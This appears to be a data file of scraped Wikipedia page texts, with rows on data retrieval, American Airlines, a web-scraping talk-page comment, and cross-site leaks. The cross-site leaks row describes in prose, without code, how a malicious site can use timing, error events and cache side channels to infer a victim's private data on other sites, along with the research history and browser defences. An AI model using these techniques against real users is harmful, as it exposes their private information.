490 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Data_retrieval | Data retrieval means obtaining data from a database management system (DBMS), like for example an object-oriented database (ODBMS). In this case, it is considered that data is represented in a structured way, and there is no ambiguity in data. In order to retrieve the desired data the user presents a set of criteria by a query. Then the database management system selects the demanded data from the database. The retrieved data may be stored in a file, printed, or viewed on the screen. A query language, like for example Structured Query Language (SQL), is used to prepare the queries. SQL is an American National Standards Institute (ANSI) standardized query language developed specifically to write database queries. Each database management system may have its own language, but most are relational. clarification needed Reports and queries are the two primary forms of the retrieved data from a database. There are some overlaps between them, but queries generally select a relatively small portion of the database, while reports show larger amounts of data. Queries also present the data in a standard format and usually display it on the monitor; whereas reports allow formatting of the output however you like and is normally printed. Reports are designed using a report generator built into the database management system. |
491 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/American_Airlines | American Airlines is a major airline in the United States headquartered in Fort Worth, Texas, within the Dallas Fort Worth metroplex. It is the largest airline in the world when measured by scheduled passengers carried, revenue passenger mile. American, together with its regional partners and affiliates, operates an extensive international and domestic network with almost 6,800 flights per day to nearly 350 destinations in 48 countries. 8 American Airlines is a founding member of the Oneworld alliance. Regional service is operated by independent and subsidiary carriers under the brand name American Eagle. 9 American Airlines and American Eagle operate out of 10 hubs, with Dallas Fort Worth International Airport (DFW) being its largest. The airline handles more than 200 million passengers annually with an average of more than 500,000 passengers daily. As of 2023 update , the company employs 103,200 staff members. American Airlines was started in 1930 as a union of more than eighty small airlines. 10 The two organizations from which American Airlines originated were Robertson Aircraft Corporation and Colonial Air Transport. The former was first created in Missouri in 1921, with both being merged in 1929 into holding company The Aviation Corporation. This, in turn, was made in 1930 into an operating company and rebranded as American Airways. In 1934, when new laws and attrition of mail contracts forced many airlines to reorganize, the corporation redid its routes into a connected system and was renamed American Airlines. The airline fully developed its international business between 1970 and 2000. It purchased Trans World Airlines in 2001. 11 American had a direct role in the development of the Douglas DC 3, which resulted from a marathon telephone call from American Airlines CEO C. R. Smith to Douglas Aircraft Company founder Donald Wills Douglas Sr., when Smith persuaded a reluctant Douglas to design a sleeper aircraft based on the DC 2 to replace American's Curtiss Condor II biplanes. (The existing DC 2's cabin was 66 inches (1.7 m) wide, too narrow for side-by-side berths.) Douglas agreed to go ahead with development only after Smith informed him of American's intention to purchase 20 aircraft. The prototype DST (Douglas Sleeper Transport) first flew on December 17, 1935, the 32nd anniversary of the Wright Brothers' flight at Kitty Hawk, North Carolina. Its cabin was 92 in (2.3 m) wide, and a version with 21 seats instead of the 14 16 sleeping berths of the DST was given the designation DC 3. There was no prototype DC 3; the first DC 3 built followed seven DSTs off the production line and was delivered to American Airlines. 12 American Airlines inaugurated passenger service on June 26, 1936, with simultaneous flights from Newark, New Jersey, and Chicago, Illinois. 13 American also had a direct role in the development of the DC 10, which resulted from a specification from American Airlines to manufacturers in 1966 to offer a widebody aircraft that was smaller than the Boeing 747, but capable of flying similar long-range routes from airports with shorter runways. McDonnell Douglas responded with the DC 10 trijet shortly after the two companies' merger. 14 On February 19, 1968, the president of American Airlines, George A. Spater, and James S. McDonnell of McDonnell Douglas announced American's intention to acquire the DC 10. American Airlines ordered 25 DC 10s in its first order. 15 16 The DC 10 made its first flight on August 29, 1970, 17 and received its type certificate from the FAA on July 29, 1971. 18 On August 5, 1971, the DC 10 entered commercial service with American Airlines on a round trip flight between Los Angeles and Chicago. 19 In 2011, due to a downturn in the airline industry, American Airlines' parent company, the AMR Corporation, filed for bankruptcy protection. In 2013, American Airlines merged with US Airways but kept the American Airlines name, as it was the better-recognized brand internationally; the combination of the two airlines resulted in the creation of the largest airline in the United States, and ultimately the world. 20 In December 2023, the company was added to the Dow Jones Sustainability World Index. 21 As of August 2024 update , American Airlines flies (or has flown) to the following destinations: American currently operates ten hubs. 75 American Airlines is a member of the Oneworld alliance and has codeshares with the following airlines: 90 In addition to the above codeshares, American Airlines has entered into three joint ventures. 94 American Airlines is a key member of the Oneworld Atlantic joint venture on flights across the north Atlantic with European carriers British Airways, Finnair, and Iberia. Aer Lingus, which shares ownership with British Airways and Iberia, has received regulatory approval to join this joint venture. 95 96 Itineraries including flights operated by Oneworld partner Alaska Airlines are sold as part of itineraries in this JV, but Alaska is not a part of the JV. 97 American Airlines has a joint venture with fellow Oneworld member Japan Airlines for flights across the Pacific. 98 Combined, the airlines offer 16 daily flights to 9 cities between Japan and the United States with connections possible on Japan Airlines beyond Japan, and on American Airlines throughout North America, Latin America, and the Caribbean. 98 American Airlines has received approval to add additional service between John F. Kennedy International Airport and Haneda Airport in Tokyo, making it the only US airline flying between New York City and Tokyo and the joint venture the leader in frequencies offered between New York City and Tokyo's primary airport. 99 100 101 In 2019, American Airlines received regulatory approval to enter into a joint business relationship with Qantas covering flights between Australia, New Zealand, and the United States. 102 103 As of June 2024 update , the American Airlines fleet consists of 970 mainline aircraft, making it the second-largest commercial airline fleet in the world. 104 105 106 American Airlines operates aircraft manufactured by Boeing and Airbus. Over 80% of American's aircraft are narrow-bodies from the Airbus A320 family and the Boeing 737 family. It is the largest A320 family aircraft operator in the world, as well as the largest operator of the A319 and A321 variants. 107 American's wide-body aircraft are all Boeing airliners; however, the majority of the airline's total fleet consists of Airbus aircraft. American Airlines is the world's largest operator of the 787 8, the smallest variant of the Boeing 787 Dreamliner. 108 Flagship First is American's international and transcontinental first class product. It is offered only on Boeing 777 300ERs and select Airbus A321s which American designates "A321T". The seats are fully lie-flat and offer direct aisle access with only one on each side of the aisle in each row. 113 As with the airline's other premium cabins, Flagship First offers wider food and beverage options, larger seats, and lounge access at certain airports. 114 American offers domestic Flagship First service on transcontinental routes between New York JFK and Los Angeles, New York JFK and San Francisco, New York-JFK and Santa Ana, Boston and Los Angeles, and Miami and Los Angeles, as well as on the standard domestic route between New York-JFK and Boston. 115 The airline will debut new Flagship Suite premium seats and a revamped aircraft interior for its long-haul fleet with fresh deliveries of its Airbus A321XLR and Boeing 787 9 aircraft, beginning in 2024. 116 Flagship Business is American's international and transcontinental business class product. It is offered on all Boeing 777 200ERs, Boeing 777 300ERs, Boeing 787 8s, and Boeing 787 9s, as well as select Airbus A321s. All Flagship Business seats are fully lie-flat. 117 The amenities in Flagship Business include complimentary alcoholic non-alcoholic beverages, multi-course meals, and lounge access. First class is offered on all domestically configured aircraft. Seats range from 19 21 inches (48 53 cm) in width and have 37 42 inches (94 107 cm) of pitch. 117 Dining options include complementary alcoholic and non-alcoholic beverages on all flights as well as standard economy snack offerings, enhanced snack basket selections on flights over 500 miles (800 km), and meals on flights 900 miles (1,400 km) or longer. 118 Premium Economy is American's economy plus product. It is offered on all widebody aircraft. The cabin debuted on the airline's Boeing 787 9s in late 2016 119 and is also available on Boeing 777 200s and 300s, and Boeing 787 8s. Premium Economy seats are wider than seats in the main cabin (American's economy cabin) and provide more amenities: Premium Economy customers get two free checked bags, priority boarding, and enhanced food and drink service including free alcohol. This product made American Airlines the first U.S. carrier to offer a four-cabin aircraft. 117 Main Cabin Extra is American's enhanced economy product. It is available on all of the mainline fleet and American Eagle aircraft. 117 Main Cabin Extra seats include greater pitch than is available in main cabin, along with free alcoholic beverages and boarding one group ahead of main cabin. 120 American retained Main Cabin Extra when the new Premium Economy product entered service in late 2016. 119 Main Cabin (economy class) is American's economy product and is found on all mainline and regional aircraft in its fleet. Seats range from 17 18.5 inches (43 47 cm) in width and have 30 32 inches (76 81 cm) of pitch. American markets a number of rows within the main cabin immediately behind Main Cabin Extra as "Main Cabin Preferred", which require an extra charge to select for those without status. 117 American Airlines marketed increased legroom in economy class as "More Room Throughout Coach", also referred to as "MRTC", starting in February 2000. Two rows of economy class seats were removed on domestic narrowbody aircraft, resulting in more than half of all standard economy seats having a pitch of 34 inches (86 cm) or more. 121 Amid financial losses, this scheme was discontinued in 2004. 122 On many routes, American also offers Basic Economy, the airline's lowest main cabin fare. Basic Economy consists of a Main Cabin ticket with numerous restrictions including waiting until check-in for a seat assignment, no upgrades or refunds, and boarding in the last group. 123 Originally Basic Economy passengers could only carry a personal item, but American later revised their Basic Economy policies to allow for a carry-on bag. 124 In May 2017, American announced it would be adding more seats to some of its Boeing 737 MAX 8 jets and reducing overall legroom in the basic economy class. The last three rows were to lose 2 inches (5.1 cm), going from the current 31 to 29 inches (79 to 74 cm). The remainder of the main cabin was to have 30 inches (76 cm) of legroom. This "Project Oasis" seating configuration has since been expanded to all 737 MAX 8s as well as standard Boeing 737 800 and non-transcontinental Airbus A321 jets. New Airbus A321neo jets have been delivered with the same configuration. This configuration has been considered unpopular with passengers, especially American's frequent flyers, as the new seats have less padding, less legroom, and no seatback entertainment. 125 126 AAdvantage is the frequent flyer program for American Airlines. It was launched on May 1, 1981, and it remains the largest frequent flyer program with over 115 million members as of 2021. 127 Miles accumulated in the program allow members to redeem tickets, upgrade service class, or obtain free or discounted car rentals, hotel stays, merchandise, or other products and services through partners. The most active members, based on the accumulation of Loyalty Points with American Airlines, are designated AAdvantage Gold, AAdvantage Platinum, AAdvantage Platinum Pro, and AAdvantage Executive Platinum elite members, with privileges such as separate check-in, priority upgrade, and standby processing, or free upgrades. AAdvantage status correspond with Oneworld status levels allowing elites to receive reciprocal benefits from American's Oneworld partner airlines. 128 better source needed AAdvantage co-branded credit cards are also available and offer other benefits. The cards are issued by CitiCards, a subsidiary of Citigroup, Barclaycard, and Bilt card in the United States, 129 by several banks including Butterfield Bank and Scotiabank in the Caribbean, 130 131 and by Banco Santander in Brazil. 132 AAdvantage allows one-way redemption, starting at 7,500 miles. 133 The Admirals Club was conceived by AA president C.R. Smith as a marketing promotion shortly after he was made an honorary Texas Ranger. Inspired by the Kentucky colonels and other honorary title designations, Smith decided to make particularly valued passengers "admirals" of the "Flagship fleet" (AA called its aircraft "Flagships" at the time). 134 better source needed The list of admirals included many celebrities, politicians, and other VIPs, as well as more "ordinary" customers who had been particularly loyal to the airline. citation needed There was no physical Admirals Club until shortly after the opening of LaGuardia Airport. During the airport's construction, New York Mayor Fiorello LaGuardia had an upper-level lounge set aside for press conferences and business meetings. At one such press conference, he noted that the entire terminal was being offered for lease to airline tenants; after a reporter asked whether the lounge would be leased as well, LaGuardia replied that it would, and a vice president of AA immediately offered to lease the premises. The airline then procured a liquor license and began operating the lounge as the "Admirals Club" in 1939. 135 The second Admirals Club opened at Washington National Airport. Because it was illegal to sell alcohol in Virginia at the time, the club contained refrigerators for the use of its members, so they could store their liquor at the airport. 136 For many years, membership in the Admirals Club (and most other airline lounges) was by the airline's invitation. After a passenger sued for discrimination, 137 the club switched to a paid membership program in 1974. 138 139 Though affiliated with the Admirals Club and staffed by many of the same employees, the Flagship Lounge is a separate lounge specifically designed for customers flying in first class and business class on international flights and transcontinental domestic flights. 140 The key trends for American Airlines are (as of the financial year ending 31 December): American Airlines, Inc., is publicly traded through its parent company, American Airlines Group Inc., under NASDAQ: AAL Nasdaq: AAL, with a market capitalization of about $12 billion as of 2019, and is included in the S P 500 index. 46 American Eagle is a network of six regional carriers that operate under a codeshare and service agreement with American, operating flights to destinations in the United States, Canada, the Caribbean, and Mexico. Three of these carriers are independent and three are subsidiaries of American Airlines Group: Envoy Air Inc., Piedmont Airlines, Inc., and PSA Airlines Inc. 46 American Airlines is headquartered across several buildings in Fort Worth, Texas that it calls the "Robert L. Crandall Campus" in honor of former president and CEO Robert Crandall. The 1,700,000 square-foot (160,000 m2) square-foot, five-building office complex called was designed by Pelli Clarke Pelli Architects. 150 The campus is located on 300 acres, adjacent to Dallas Fort Worth International Airport, American's fortress hub. 151 Before it was headquartered in Texas, American Airlines was headquartered at 633 Third Avenue in the Murray Hill area of Midtown Manhattan, New York City. 152 153 In 1979, American moved its headquarters to a site at Dallas Fort Worth International Airport, which affected up to 1,300 jobs. Mayor of New York City Ed Koch described the move as a "betrayal" of New York City. 154 American moved to two leased office buildings in Grand Prairie, Texas. 155 On January 17, 1983, the airline finished moving into a $150 million ($459,000,000 when adjusted for inflation), 550,000 square-foot (51,000 m2) facility in Fort Worth; $147 million (about $450,000,000 when adjusted for inflation) in Dallas Fort Worth International Airport bonds financed the headquarters. The airline began leasing the facility from the airport, which owns the facility. 155 Following the merger of US Airways and American Airlines, the new company consolidated its corporate headquarters in Fort Worth, abandoning the US Airways headquarters in Phoenix, AZ. As of 2015, American Airlines is the corporation with the largest presence in Fort Worth. 156 In 2015, American announced that it would build a new headquarters in Fort Worth. Groundbreaking began in the spring of 2016 and occupancy completed in September 2019. 157 The airline plans to house 5,000 new workers in the building. 156 It will be located on a 41 acre (17 ha) property adjacent to the airline's flight academy and conference and training center, west of Texas State Highway 360, 2 miles (3.2 km) 157 west from the current headquarters. The airline will lease a total of 300 acres (120 ha) from Dallas Fort Worth International Airport and this area will include the headquarters. 156 Construction of the new headquarters began after the demolition of the Sabre facility, previously on the site. 157 The airline considered developing a new headquarters in Irving, Texas, on the old Texas Stadium site, before deciding to keep the headquarters in Fort Worth. 156 In 1931, Goodrich Murphy, an American employee, designed the AA logo as an entry in a logo contest. The eagle in the logo was copied from a Scottish hotel brochure. 158 The logo was redesigned by Massimo Vignelli in 1967. 159 160 Thirty years later, in 1997, American Airlines was able to make its logo Internet-compatible by buying the domain AA.com. AA is also American's two-letter IATA airline designator. 161 On January 17, 2013, American launched a new rebranding and marketing campaign with FutureBrand dubbed, "A New American". This included a new logo, which includes elements of the 1967 logo. 162 American Airlines faced difficulty obtaining copyright registration for their 2013 logo. On June 3, 2016, American Airlines sought to register it with the United States Copyright Office, 163 but in October of that year, the Copyright Office ruled that the logo was ineligible for copyright protection, as it did not pass the threshold of originality, and was thus in the public domain. 163 American requested that the Copyright Office reconsider, but on January 8, 2018, the Copyright Office affirmed its initial determination. 163 164 After American Airlines submitted additional materials, the Copyright Office reversed its decision on December 7, 2018, and ruled that the logo contained enough creativity to merit copyright protection. 165 American's early liveries varied widely, but a common livery was adopted in the 1930s, featuring an eagle painted on the fuselage. 166 The eagle became a symbol of the company and inspired the name of American Eagle Airlines. Propeller aircraft featured an international orange lightning bolt running down the length of the fuselage, which was replaced by a simpler orange stripe with the introduction of jets. 167 In the late 1960s, American commissioned designer Massimo Vignelli to develop a new livery. The original design called for a red, white, and blue stripe on the fuselage, and a simple "AA" logo, without an eagle, on the tail; instead, Vignelli created a highly stylized eagle, which remained the company's logo until January 16, 2013. 168 On January 17, 2013, American unveiled a new livery. 169 Before then, American had been the only major U.S. airline to leave most of its aircraft surfaces unpainted. This was because C. R. Smith would not say he liked painted aircraft and refused to use any liveries that involved painting the entire plane. Robert "Bob" Crandall later justified the distinctive natural metal finish by noting that less paint reduced the aircraft's weight, thus saving on fuel costs. 170 In January 2013, American launched a new rebranding and marketing campaign dubbed, "The New American". In addition to a new logo, American Airlines introduced a new livery for its fleet. The airline calls the new livery and branding "a clean and modern update". 171 The current design features an abstract American flag on the tail, along with a silver-painted fuselage, as a throw-back to the old livery. The new design was painted by Leading Edge Aviation Services in California. 172 Doug Parker, the incoming CEO, indicated that the new livery could be short-lived, stating that the only reason this is an issue now is that they just did it right in the middle of the merger , which kind of makes it confusing, so that gives us an opportunity, actually, to decide if we are going to do something different because we have so many airplanes to paint". 173 The current logo and livery have had mixed criticism, with Design Shack editor Joshua Johnson writing that they "boldly and proudly communicate the concepts of American pride and freedom wrapped into a shape that instantly makes you think about an airplane", 174 and AskThePilot.com author Patrick Smith describing the logo as 'a linoleum knife poking through a shower curtain'. 175 Later in January 2013, Bloomberg asked the designer of the 1968 American Airlines logo (Massimo Vignelli) on his opinion over the rebranding. 176 In the end, American let their employees decide the new livery's fate. On an internal website for employees, American posted two options, one the new livery and one a modified version of the old livery. All of the American Airlines Group employees (including US Airways and other affiliates) were able to vote. 177 American ultimately decided to keep the new look. Parker announced that American would keep a US Airways and America West heritage aircraft in the fleet, with plans to add a heritage TWA aircraft and a heritage American plane with the old livery. 178 As of September 2019, American has heritage aircraft for Piedmont, PSA, America West, US Airways, Reno Air, TWA, and AirCal in their fleet. 179 They also have two AA branded heritage 737 800 aircraft, an AstroJet N905NN, 180 and the polished aluminum livery used from 1967 to 2013, N921NN. 181 American, both before and after the merger with US Airways, has consistently performed poorly in rankings. The Wall Street Journal's annual airline rankings have ranked American as the worst or second-worst U.S. carrier for ten of the past twelve years, and in the bottom three of U.S. Airlines for at least the past twelve years. The airline has persistently performed poorly in the areas of losing checked luggage and bumping passengers due to oversold flights. 182 The main representatives of key groups of employees are: In 1942, American Airlines established Sky Chefs, a wholly-owned subsidiary, as a catering company to serve their fleet. 190 In 1986, Sky Chefs was sold to Toronto-based Onex Capital Corporation for $170 million. 190 191 Sky Chefs became a subsidiary of Onex Food Services Inc. 192 citation needed Since 2001, it has been fully owned by the LSG Group. 193 194 In the late 1960s, American Airlines established the Flagship Hotels chain as a subsidiary of Sky Chefs. On July 21, 1972, American Airlines leased four hotels from the Loews Corporation, three of them branded as Americana Hotels, for a period of thirty years. American merged the hotels with their Flagship Hotels, and rebranded the entire chain as Americana Hotels. 195 In 1980, American Airlines sold Americana Hotels to Bass Brothers Enterprises of Fort Worth, Texas. 196 Between October 1993 to July 1998, American Airlines was repeatedly cited for using high-sulfur fuel in motor vehicles at 10 major airports around the country, a violation of the Clean Air Act. 197 Since 1981, as a means of creating revenue in a period of loss-making, American Airlines had offered a lifetime pass of unlimited travel, for the initial cost of $250,000. 198 This entitled the pass holder to fly anywhere in the world. Twenty-eight were sold. However, after some time, the airline realized they were making losses on the tickets, with the ticketholders costing them up to $1 million each. Ticketholders were booking large numbers of flights with some ticketholders flying interstate for lunch or flying to London multiple times a month. AA raised the cost of the lifetime pass to $3 million, and then finally stopped offering it in 2003. AA then used litigation to cancel two of the lifetime offers, saying the passes "had been terminated due to fraudulent activity". 199 On October 24, 2017, the NAACP issued a travel advisory for American Airlines urging African Americans to "exercise caution" when traveling with the airline. The NAACP issued the advisory after four incidents. In one incident, a black woman was moved from first class to coach while her white traveling companion was allowed to remain in first class. In another incident, a black man was forced to give up his seats after being confronted by two unruly white passengers. 210 According to the NAACP, while they did receive complaints on other airlines, most of their complaints in the year before their advisory were on American Airlines. 211 In July 2018, the NAACP lifted their travel advisory saying that American has made improvements to mitigate discrimination and unsafe treatment of African Americans. 212 As of March 2019, American Airlines has had almost sixty aircraft hull losses, beginning with the crash of an Ford 5 AT-C Trimotor in August 1931. 213 214 Of the hull losses, most were propeller driven aircraft, including three Lockheed L 188 Electra aircraft (of which one, the crash in 1959 of Flight 320, resulted in fatalities). 214 The two accidents with the highest fatalities in both the airline's and U.S. aviation history were Flight 191 in 1979 and Flight 587 in 2001. 215 Out of the 17 hijackings of American Airlines flights, two aircraft were hijacked and destroyed in the September 11 attacks: Flight 11 crashed into the North Tower of the World Trade Center, and Flight 77 crashed into the Pentagon. 216 Flight 11, which is responsible for an estimated 1,700 deaths, is the deadliest air crash in the history of aviation. American Airlines reported total CO2e emissions (direct and indirect) for the twelve months ending December 31, 2020, at 20,092 Kt ( 21,347 51.5% y-o-y). 217 The company aims to achieve net zero carbon emissions by 2050. 218 In November 2023, American Airlines purchased the first carbon credit contract (for 10,000 metric tons of CO2 sequestered at $100 per ton) from Graphyte, a carbon removal startup company invested in by Breakthrough Energy that compresses sawdust, tree bark, rice hulls, plant stalks, and other agricultural waste into biomass bricks wrapped in a polymer barrier to prevent decomposition that are stored underground. 219 220 |
492 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Talk:Web_scraping | This article links to one or more target anchors that no longer exist. Quote from article: "A web scraper is an Application Programming Interface (API) to ... But is this correct? Isn't a web scraper more than just an API? 194.39.218.10 (talk) 14:58, 6 February 2020 (UTC) reply |
493 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Cross-site_leaks | Cross-site leaks, also known as XS-leaks, is an internet security term used to describe a class of attacks used to access a user's sensitive information on another website. Cross-site leaks allow an attacker to access a user's interactions with other websites. This can contain sensitive information. Web browsers normally stop other websites from seeing this information. This is enforced through a set of rules called the same-origin policy. Attackers can sometimes get around these rules, using a "cross-site leak". Attacks using a cross-site leak are often initiated by enticing users to visit the attacker's website. Upon visiting, the attacker uses malicious code on their website to interact with another website. This can be used by a attacker to learn about the user's previous actions on the other website. The information from this attack can uniquely identify the user to the attacker. These attacks have been documented since 2000. One of the first research papers on the topic was published by researchers at Purdue University. The paper described an attack where the web cache was exploited to gather information about a website. Since then, cross-site leaks have become increasingly sophisticated. Researchers have found newer leaks targeting various web browser components. While the efficacy of some of these techniques varies, newer techniques are continually being discovered. Some older methods are blocked through updates to browser software. The introduction and removal of features on the Internet also lead to some attacks being rendered ineffective. Cross-site leaks are a diverse form of attack, and there is no consistent classification of such attacks. Multiple sources classify cross-site leaks by the technique used to leak information. Among the well-known cross-site leaks are timing attacks, which depend on timing events within the web browser. Error events constitute another category, using the presence or absence of events to disclose data. Additionally, cache-timing attacks rely on the web cache to unveil information. Since 2023, newer attacks that use operating systems and web browser limits to leak information have also been found. Before 2017, defending against cross-site leaks was considered to be difficult. This was because many of the information leakage issues exploited by cross-site leak attacks were inherent to the way websites worked. Most defences against this class of attacks have been introduced after 2017 in the form of extensions to the hypertext transfer protocol (HTTP). These extensions allow websites to instruct the browser to disallow or annotate certain kinds of stateful requests coming from other websites. One of the most successful approaches browsers have implemented is SameSite cookies. SameSite cookies allow websites to set a directive that prevents other websites from accessing and sending sensitive cookies. Another defence involves using HTTP headers to restrict which websites can embed a particular site. Cache partitioning also serves as a defence against cross-site leaks, preventing other websites from using the web cache to exfiltrate data. Web applications (web apps) have two primary components: a web browser and one or more web servers. The browser typically interacts with the servers via hyper text transfer protocol (HTTP) and WebSocket connections to deliver a web app. note 1 To make the web app interactive, the browser also renders HTML and CSS, and executes JavaScript code provided by the web app. These elements allow the web app to react to user inputs and run client-side logic. 2 Often, users interact with the web app over long periods of time, making multiple requests to the server. To keep track of such requests, web apps often use a persistent identifier tied to a specific user through their current session or user account. 3 This identifier can include details like age or access level, which reflect the user's history with the web app. If revealed to other websites, these identifiable attributes might deanonymize the user. 4 Ideally, each web app should operate independently without interfering with others. However, due to various design choices made during the early years of the web, web apps can regularly interact with each other. 5 To prevent the abuse of this behavior, web browsers enforce a set of rules called the same-origin policy that limits direct interactions between web applications from different sources. 6 7 Despite these restrictions, web apps often need to load content from external sources, such as instructions for displaying elements on a page, design layouts, and videos or images. These types of interactions, called cross-origin requests, are exceptions to the same-origin policy. 8 They are governed by a set of strict rules known as the cross-origin resource sharing (CORS) framework. CORS ensures that such interactions occur under controlled conditions by preventing unauthorized access to data that a web app is not allowed to see. This is achieved by requiring explicit permission before other websites can access the contents of these requests. 9 Cross-site leaks allow attackers to circumvent the restrictions imposed by the same-origin policy and the CORS framework. They leverage information-leakage issues (side channels) that have historically been present in browsers. Using these side channels, an attacker can execute code that can infer details about data that the same origin policy would have shielded. 10 This data can then be used to reveal information about a user's previous interactions with a web app. 11 To carry out a cross-site leak attack, an attacker must first study how a website interacts with users. They need to identify a specific URL that produces different Hyper Text Transfer Protocol (HTTP) responses based on the user's past actions on the site. 12 13 For instance, if the attacker is trying to attack Gmail, they could try to find a search URL that returns an different HTTP response based on how many search results are found for a specific search term in a user's emails. 14 Once an attacker finds a specific URL, they can then host a website and phish or otherwise lure unsuspecting users to the website. Once the victim is on the attacker's website, the attacker can use various embedding techniques to initiate cross-origin HTTP requests to the URL identified by the attacker. 15 However, since the attacker is on a different website, the same-origin policy imposed by the web browser will prevent the attacker from directly reading any part of the response sent by the vulnerable website. note 2 16 To circumvent this security barrier, the attacker can use browser-leak methods, to distinguish subtle differences between different responses. Browser leak methods are JavaScript, CSS or HTML snippets that leverage long-standing information leakage issues (side channels) in the web browser to reveal specific characteristics about a HTTP response. 12 13 In the case of Gmail, the attacker could use JavaScript to time how long the browser took to parse the HTTP response returned by the search result. If the time taken to parse the response returned by the endpoint was low, the attacker could infer that there were no search results for their query. Alternatively, if the site took longer, the attacker could infer that multiple search results were returned. 14 The attacker can subsequently use the information gained through these information leakages to exfiltrate sensitive information, which can be used to track and deanonymize the victim. 15 In the case of Gmail, the attacker could make a request to the search endpoint with a query and subsequently measure the time the query took to figure out whether or not the user had any emails containing a specific query string. note 3 If a response takes very little time to be processed, the attacker can assume that no search results were returned. Conversely, if a response takes a large amount amount of time to be processed, the attacker infer that a lot of search results were returned. By making multiple requests, an attacker could gain significant insight into the current state of the victim application, potentially revealing private information of a user, helping launch sophisticated spamming and phishing attacks. 17 Cross-site leaks have been known about since 2000; 18 research papers dating from that year from Purdue University describe a theoretical attack that uses the HTTP cache to compromise the privacy of a user's browsing habits. 19 In 2007, Andrew Bortz and Dan Boneh from Stanford University published a white paper detailing an attack that made use of timing information to determine the size of cross-site responses. 20 In 2015, researchers from Bar-Ilan University described a cross-site search attack that used similar leaking methods. The attack employed a technique in which the input was crafted to grow the size of the responses, leading to a proportional growth in the time taken to generate the responses, thus increasing the attack's accuracy. 21 Independent security researchers have published blog posts describing cross-site leak attacks against real-world applications. In 2009, Chris Evans described an attack against Yahoo Mail via which a malicious site could search a user's inbox for sensitive information. 22 In 2018, Luan Herrara found a cross-site leak vulnerability in Google's Monorail bug tracker, which is used by projects like Chromium, Angle, and Skia Graphics Engine. This exploit allowed Herrara to exfiltrate data about sensitive security issues by abusing the search endpoint of the bug tracker. 23 24 In 2019, Terjanq, a Polish security researcher, published a blog post describing a cross-site search attack that allowed them to exfiltrate sensitive user information across high-profile Google products. 25 26 As part of its increased focus on dealing with security issues that depend on misusing long-standing web-platform features, Google launched XSLeaks Wiki in 2020. The initiative aimed to create an open-knowledge database about web-platform features that were being misused and analysing and compiling information about cross-site leak attacks. 22 27 28 Since 2020, there has been some interest among the academic security community in standardizing the classification of these attacks. In 2020, Sudhodanan et al. were among the first to systematically summarize previous work in cross-site leaks, and developed a tool called BASTA-COSI that could be used to detect leaky URLs. 28 29 In 2021, Knittel et al. proposed a new formal model to evaluate and characterize cross-site leaks, allowing the researchers to find new leaks affecting several browsers. 28 30 In 2022, Van Goethem et al. evaluated currently available defences against these attacks and extended the existing model to consider the state of browser components as part of the model. 28 13 In 2023, a paper published by Rautenstrauch et al. systemizing previous research into cross-site leaks was awarded the Distinguished Paper Award at the IEEE Symposium on Security and Privacy. 31 The threat model of a cross-site leak relies on the attacker being able to direct the victim to a malicious website that is at least partially under the attacker's control. The attacker can accomplish this by compromising a web page, by phishing the user to a web page and loading arbitrary code, or by using a malicious advertisement on an otherwise-safe web page. 32 33 Cross site leak attacks require that the attacker identify at least one state-dependent URL in the victim app for use in the attack app. Depending on the victim app's state, this URL must provide at least two responses. A URL can be crafted, for example, by linking to content that is only accessible to the user if they are logged into the target website. Including this state-dependent URL in the malicious application will initiate a cross-origin request to the target app. 15 Because the request is a cross-origin request, the same-origin policy prevents the attacker from reading the contents of the response. Using a browser-leak method, however, the attacker can query specific identifiable characteristics of the response, such as the HTTP status code. This allows the attacker to distinguish between responses and gain insight into the victim app's state. 12 13 While every method of initiating a cross-origin request to a URL in a web page can be combined with every browser-leak method, this does not work in practice because dependencies exist between different inclusion methods and browser leaks. Some browser-leak methods require specific inclusion techniques to succeed. 34 For example, if the browser-leak method relies on checking CSS attributes such as the width and height of an element, the inclusion technique must use an HTML element with a width and height property, such as an image element, that changes when a cross-origin request returns an invalid or a differently sized image. 35 36 Cross-site leaks comprise a highly varied range of attacks 37 for which there is no established, uniform classification. 38 However, multiple sources typically categorized these attacks by the leaking techniques used during an attack. 34 As of 2021 update , researchers have identified over 38 leak techniques that target components of the browser. 32 New techniques are typically discovered due to changes in web platform APIs, which are JavaScript interfaces that allow websites to query the browser for specific information. 39 Although the majority of these techniques involve directly detecting state changes in the victim web app, some attacks also exploit alterations in shared components within the browser to indirectly glean information about the victim web app. 34 Timing attacks rely on the ability to time specific events across multiple responses. 40 These were discovered by researchers at Stanford University in 2007, making them one of the oldest-known types of cross-site leak attacks. 20 While initially used only to differentiate between the time it took for a HTTP request to resolve a response, 20 research performed after 2007 has demonstrated the use of this leak technique to detect other differences across web-app states. In 2017, Vila et al. showed timing attacks could infer cross-origin execution times across embedded contexts. This was made possible by a lack of site isolation features in contemporaneous browsers, which allowed an attacking website to slow down and amplify timing differences caused by differences in the amount of JavaScript being executed when events were sent to a victim web app. 41 42 In 2021, Knittel et al. showed the Performance API note 4 could leak the presence or absence of redirects in responses. This was possible due to a bug in the Performance API that allowed the amount of time shown to the user to be negative when a redirect occurred. Google Chrome subsequently fixed this bug. 44 In 2023, Snyder et al. showed timing attacks could be used to perform pool-party attacks in which websites could block shared resources by exhausting their global quota. By making the victim web app execute JavaScript that used these shared resources and then timing how long these executions took, the researchers were able to reveal information about the state of a web app. 45 Error events is a leak technique that allows an attacker to distinguish between multiple responses by registering error-event handlers and listening for events through them. Due to their versatility and ability to leak a wide range of information, error events are considered a classic cross-site leak vector. 46 One of the most-common use cases for error events in cross-site leak attacks is determining HTTP responses by attaching the event handlers onload and onerror event handlers to a HTML element and waiting for specific error events to occur. A lack of error events indicates no HTTP errors occurred. In contrast, if the handler onerror is triggered with a specific error event, the attacker can use that information to distinguish between HTTP content types, status codes and media-type errors. 47 In 2019, researchers from TU Darmstadt showed this technique could be used to perform a targeted deanonymization attack against users of popular web services such as Dropbox, Google Docs, and GitHub that allow users to share arbitrary content with each other. 48 49 Since 2019, the capabilities of error events have been expanded. In 2020, Janc et al. showed by setting the redirect mode for a fetch request to manual, a website could leak information about whether a specific URL is a redirect. 50 42 Around the same time, Jon Masas and Luan Herrara showed by abusing URL-related limits, an attacker could trigger error events that could be used to leak redirect information about URLs. 51 In 2021, Knittel et al. showed error events that are generated by a subresource integrity check, a mechanism that is used to confirm a sub-resource a website loads has not been changed or compromised, could also be used to guess the raw content of an HTTP response and to leak the content-length of the response. 